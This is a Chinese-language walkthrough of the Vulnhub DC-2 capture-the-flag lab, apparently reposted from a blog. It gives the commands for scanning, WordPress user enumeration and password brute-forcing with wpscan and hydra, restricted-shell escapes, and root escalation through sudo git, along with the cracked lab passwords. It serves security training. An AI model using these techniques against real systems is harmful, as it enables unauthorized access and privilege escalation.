标签:bin git 登录 DC jerry dc Vulnhub 绕过
信息收集
arp扫内网
扫端口
nmap -A -p- -T4 192.168.1.139 -v
发现端口80和7744(ssh)
直接访问80端口会跳转,导致无法访问
kali修改hosts
漏洞利用
成功访问后到flag1
给了提示要用到cewl,cewl kali自带,用于爬行网站生成弱密码
cewl http://dc-2/ -w dc-2.txt
但是不知道用户名,先留着,
这里是wordpress框架,用wpscan(kali自带)爆出用户名
wpscan --url dc-2 -e u
爆出三个用户,在用cewl生成的字典进行密码爆破
wpscan --url http://dc-2 -P dc-2.txt -U admin
爆出来两个
tom/parturient jerry/adipiscing
dirb 扫目录
dirb http://dc-2
访问会直接跳转登录,拿上面账号登录
http://dc-2/wp-admin/user/
tom登录没东西
拿jerry登录
找到flag2
有个ssh,尝试爆破ssh
hydra -l tom -P dc-2.txt 192.168.1.139 ssh -s 7744 -V -t 5
jerry爆破失败
tom登录成功,不能用cat
命令执行绕过
最终发现只能用less
看到提示
发现有个su,用su登录jerry,这里也不知道为啥,jerry有密码但却不能爆破成功
其实做多了就知道flag在用户目录下
还是照着提示来,su不能用,要进行绕过
新东西
shell绕过限制
shell绕过限制学习
这里用修改环境变量的方法
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
当然看到别的wp里还有别的手法,我个人没试出来
可使用less绕过:$less test 然后!'sh'
使用ls绕过:$man ls 然后!'sh'
使用vi绕过:$vi test 然后:!/bin/sh 或者 :!/bin/bash
即可绕过,然后flag4在jerry用户目录下
提权
提示提到了git,搜索git提权
切换jerry登录
sudo git help config
sudo git -p help
sudo git -p --help
成功提权
标签:bin,git,登录,DC,jerry,dc,Vulnhub,绕过 来源: https://blog.csdn.net/SopRomeo/article/details/114191793
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。